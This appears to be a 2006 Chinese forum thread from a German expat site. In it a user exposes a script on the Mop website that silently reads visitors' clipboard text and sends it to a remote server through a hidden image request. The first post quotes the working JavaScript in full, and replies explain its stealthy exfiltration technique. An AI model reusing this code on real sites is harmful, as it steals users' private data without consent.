萍聚社区-德国热线-德国实用信息网

 找回密码
 注册

微信登录

微信扫一扫,快速登录

查看: 675|回复: 4

猫扑的页面

[复制链接]
发表于 2006-5-1 22:05 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x
都说猫扑很火,无聊就去看了看。上来就跳出来一个对话框要播放一个shockwave的东东,可能因为欧没有装有关的插件。满页面乱七八糟,不喜欢。俺猜是不是广告垃圾太多,就看看用Adblock能不能屏蔽一些,结果看到有这么一条:
<script src="http://211.100.32.96/monitor.js"></script>,内容是

function URLencode(sStr) {
    return escape(sStr).replace(/\+/g, '%2B').replace(/\"/g,'%22').replace(/\'/g, '%27').replace(/\//g,'%2F');
}
var content = window.clipboardData.getData('Text');
if(content){
if(content != '' && content != 'null' && content.length<500){
var keyimg = new Image();
keyimg.src='http://211.100.32.96/save.jsp?key='+URLencode(content);
}
}

俺虽然不懂脚本,不过是在觉得可疑。他猫扑为什么要存俺剪贴板的内容呢?好在这东东只有IE支持,而且要打开允许脚本访问剪贴板。

评分

1

查看全部评分

Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
发表于 2006-5-2 00:07 | 显示全部楼层
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
发表于 2006-5-2 00:38 | 显示全部楼层
这个脚本是很奇怪,理论是取剪切板里的小于500个字长的text类型文件,然后送到服务器端去存储,之后返回一个图片文件的url地址到本地。感觉是类似于信息搜索的东东
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
发表于 2006-5-2 15:54 | 显示全部楼层
这只是用来上传盗取的信息的手段。

如果用put方式,就要用javascript操作form,悄悄地提交,则涉及到页面刷新问题,得用iframe。而使用隐式img(注意该img并不在页面中得到应用),则是简单地利用了get方式,比较隐蔽。

而http规范对get的查询串大小是有限制的,所以他不得已才截了一部分,否则肯定是能偷多少就偷多少。如今的网站,很是居心叵测啊......
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
发表于 2006-5-2 15:57 | 显示全部楼层
也亏得有这个限制,不然他很容易被自己的脚本DoS攻击呢,呵呵
Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

手机版|Archiver|AGB|Impressum|Datenschutzerklärung|萍聚社区-德国热线-德国实用信息网

GMT+2, 2025-5-8 03:08 , Processed in 0.058472 second(s), 17 queries , Redis On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表